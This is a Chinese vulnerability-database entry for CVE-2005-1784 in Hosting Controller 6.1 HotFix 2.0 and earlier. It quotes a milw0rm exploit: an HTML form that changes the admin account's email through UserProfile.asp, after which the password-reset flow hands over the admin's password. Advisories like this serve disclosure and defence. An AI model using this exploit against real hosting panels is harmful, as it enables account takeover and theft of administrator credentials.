Hosting Controller 漏洞

Hosting Controller 漏洞

漏洞ID 1108815 漏洞类型 未知
发布时间 2005-05-27 更新时间 2005-05-27
图片[1]-Hosting Controller 漏洞-安全小百科CVE编号 CVE-2005-1784
图片[2]-Hosting Controller 漏洞-安全小百科CNNVD-ID CNNVD-200505-1217
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1015
https://www.securityfocus.com/bid/89930
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1217
|漏洞详情
HostingController6.1HotFix2.0及更早版本允许远程攻击者通过修改UserProfile.asp的updateprofile操作中的emailaddress参数来偷窃密码并获取权限。
|漏洞EXP
<!--

Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).

Title: Hosting controller program have a security bug
in "UserProfile.asp" that an authenticated user can
change other's profiles.
Why is it dangerous: a user can change other's email
address and then use forgot password to recieve their
password! also he/she can gain administrator password
by this way!
Version: 6.1 HotFix 2.0 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to
manage a host.

Exploit code to proof:
--------------------------------
Change users profiles: --> 



<form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post">
Username : <input name="UserList" value="hcadmin" type="text" size="50">
<br>
emailaddress : <input name="emailaddress" value="[email protected]" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat" type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>

<!--
-----------------------------------
Now u can use forgot password to gain passwords! -->

# milw0rm.com [2005-05-27]
|受影响的产品
Hosting Controller Hosting Controller 6.1.0 Hotfix 3.2 6.1 Hotfix 2.0
|参考资料

来源:SECTRACK
名称:1014062
链接:http://securitytracker.com/id?1014062

相关推荐: Windows NT PATH权限许可和访问控制漏洞

Windows NT PATH权限许可和访问控制漏洞 漏洞ID 1207500 漏洞类型 未知 发布时间 1997-07-25 更新时间 1997-07-25 CVE编号 CVE-1999-1217 CNNVD-ID CNNVD-199707-037 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享